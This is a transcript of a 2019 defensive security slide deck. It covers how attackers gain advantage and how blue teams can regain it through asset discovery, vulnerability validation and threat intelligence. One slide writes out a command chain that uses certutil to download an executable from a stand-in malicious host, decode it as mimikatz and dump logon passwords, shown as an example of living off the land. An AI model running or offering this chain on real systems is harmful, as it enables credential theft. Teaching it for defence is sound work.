Regaining the High Ground

Transcript

1. Regaining the High Ground

2. Sun Tzu Says… 2019-11-27 Regaining the High Ground © 2019,

   Blue Team Cyber 2 All armies love the high ground and hate the low, and prefer sunny places to dark and shade.

3. How the good guys get owned… Social engineering Unpatched systems

   Malware 2019-11-27 Regaining the High Ground © 2019, Blue Team Cyber 3

4. Regaining the High Ground © 2019, Blue Team Cyber How

   the jerks enemy takes the high ground… 2019-11-27 4 u Thinking in graphs instead of lists u Finding resources you don’t know exist u Living off the land with built-in utilities

5. • Asset lists, vulnerability spreadsheets, user directories… these are lists

   that defenders usually use • If one system is breached, what does that mean for other assets? Thinking in graphs helps us predict how many user accounts may be compromised, or connections to other assets that may be compromised in case of a breach. • We need to move beyond creating lists of assets, users, etc., and looking at the relationships between each. • Looking at your network as an actual ecosystem, where business functions rely on systems, which rely on users, and create these relationships to determine where the greatest threat lies, as well as the probability and impact of said threats. Helps attackers discover relationships between systems and applications, as well as user accounts, throughout a given environment. Thinking in Graphs… 2019-11-27 Regaining the High Ground © 2019, Blue Team Cyber 5 WebSrv DB Srv SSH SQL SSH RDP In contrast, many - if not most - defenders are still thinking in lists such as asset inventory and user accounts. DC Jump Box

6. Finding assets you don’t know exist… 2019-11-27 Regaining the High

   Ground © 2019, Blue Team Cyber 6 Scans such as ARP scanning, Nmap, and vulnerability scans are performed by the bad guys once they get a foothold on the network. These are often scans that the defenders are not permitted to perform due to their being “resource intensive” or “noisy”.

7. Remember when the bad guys had to import malware to

   pull payloads? Now tools like certutil can be used to download those bad applications! There are all kinds of built-in utilities that provide neat functionality for attackers to download malicious payloads and other goodies to further exploit systems and maintain persistence within your environment. Living off the land… 2019-11-27 Regaining the High Ground © 2019, Blue Team Cyber 7 Once the attacker gets in, they install malware in order to maintain persistence and exfiltrate data or perform other nefarious deeds… Or at least they used to. Now they can leverage tools built into the OS to do their bidding. C:\>certutil.exe –urlcache –split –f http://malurl.com/mimi-base64.exe C:\>certutil.exe –decode mimikatz-base64.exe mimikatz-decoded.exe C:\>mimikatz-decoded.exe mimikatz # sekurlsa::logonpasswords

8. Regaining the High Ground © 2019, Blue Team Cyber Taking

   back the high ground 2019-11-27 8 u Illuminate your network u Validate your vulnerabilities u Internalize external threats u Shore up those holes!

9. • Observe: Where we collect “observables” from the environment that

   tell us whether or not there is something bad happening on our network/systems. • Orient: We take the observables and apply business and IT context around them to determine the probability of the threat affecting your org, and what the impact may be. • Decide: Settle on a course of action to remediate/mitigate the threat, lay out the actors/tasks, and assign roles and responsibilities. • Act: Execute the strategy devised in the Decide stage. • And start over… observe the outcomes from the actions, and move forward. The OODA Loop. 2019-11-27 Regaining the High Ground © 2019, Blue Team Cyber 9 Observe Orient Decide Act Gather info about the current situation Contextualize information to the current incident Determine next steps towards improvement Execute based on decision outcomes AKA: The Circle of Life

10. Illuminate Your Environment Regaining the High Ground © 2019, Blue

    Team Cyber 2019-11-27 10

11. Illuminate Your Environment 2019-11-27 Regaining the High Ground © 2019,

    Blue Team Cyber 11 Compliance! NOTES • Looks like everything’s running just tickety-boo. You know your flows, you’ve got your server enclaves built out, systems and IoT are running through proxies • You’ve got a compliant environment – ticked all the boxes, got your staff trained up on security awareness videos, acceptable use policy is signed off, and your org charts are on lock. • Now, to dig a little deeper.

12. • Once you start looking more closely, you find… •

    Someone’s running some shadow IT in the cloud to make it easier to store work files they’ll need to work on at home • Turns out there was a VIP coming to town, so someone stood up an office space with a separate wifi access point… and never took it down • The IT squad has set up an impromptu lab to test gear and meet their objectives for next-gen conference rooms, and all of the gear is connecting to the Internet for its updates • A developer is learning some new methods for extracting data, and decides to stand up a local instance of the DBMS, then connects it to the production DBMS to replicate some of the data • Someone set up a VPN tunnel from home to be able to work remotely • Buddy there decided that he wants remote access to his DMZ box, so he opens up port 3389 to remote into his IIS box • The chain of command has changed over time, and a lot of the compliance checkboxes are moot, because things have become rather… ad hoc. 2019-11-27 Regaining the High Ground © 2019, Blue Team Cyber 12 Illuminate Your Environment Chain of Command

13. Just scan it. • Nmap to determine what’s listening, VA

    Scan to determine where you’ve got holes, • Vulnerability scan to determine where you might have some oopsies • If you’re worried about scans knocking stuff down, just scan subnet by subnet – hopefully that means having a scanner in each subnet, but it might mean re-IP-ing a scanner (brutal, but I’ve seen it) • Use tools on the endpoint to help you gather required data • Send the data to a centralized data store for future analysis How do we illuminate our networks? 2019-11-27 Regaining the High Ground © 2019, Blue Team Cyber 13

14. Validate Your Vulnerabilities Regaining the High Ground © 2019, Blue

    Team Cyber 2019-11-27 14

15. Validate Your Vulnerabilities 2019-11-27 Regaining the High Ground © 2019,

    Blue Team Cyber 15

16. • Vulnerability validation is a sweet science, not a button

    click • Are you able to exploit the vulnerability? • How many hosts are vulnerable? If you’ve got 10,000 Flash vulnerabilities, you need to upgrade/remove Flash. • Where are vulnerable hosts? If you’ve got 10 vulns, but they’re internet facing… you need to test to see how easy they are to exploit, then mitigate. • Test your vulns – social engineering/phishing to gain access, pen testing to try to open up vulnerable hosts… run through your own personal kill chain • Grab some artifacts while you’re in there, eh? Help your team detect the type of activity that you’re performing. • # Hosts affected • Affected host location • Identify known exploit traffic internally • PoC||GTFO • Pen test and gather artifacts Validate Your Vulnerabilities 2019-11-27 Regaining the High Ground © 2019, Blue Team Cyber 16

17. Internalize External Threats Regaining the High Ground © 2019, Blue

    Team Cyber 2019-11-27 17

18. Do we just let them in? Well, no… Regaining the

    High Ground © 2019, Blue Team Cyber 2019-11-27 18 Do your research Do Monitor CTI Feeds for IOCs/IOAs Monitor Understand Attacker TTPs Understand

19. NOTES • Why on earth would we want to do

    this? Because if we don’t, someone else will. • Find the tools, tactics, and procedures that the bad guys might use against you and test them yourself against your infrastructure. • Human- and machine-based analysis will also prove handy here – don’t just take information at face value • From this comes your very own playbooks for defending your assets, testing your defences, and detecting those with ill intentions Internalize External Threats 2019-11-27 Regaining the High Ground © 2019, Blue Team Cyber 19

20. Shore up Those Holes! Regaining the High Ground © 2019,

    Blue Team Cyber 2019-11-27 20

21. Shore up Those Holes! Regaining the High Ground © 2019,

    Blue Team Cyber 2019-11-27 21 Build your own defensive TTPs Whitelist apps and traffic Maintain a central store of all discovery data and IOCs Get a handle on who does what • Basically, just do the basics! • Not as easy as it sounds, obviously • Automate where possible!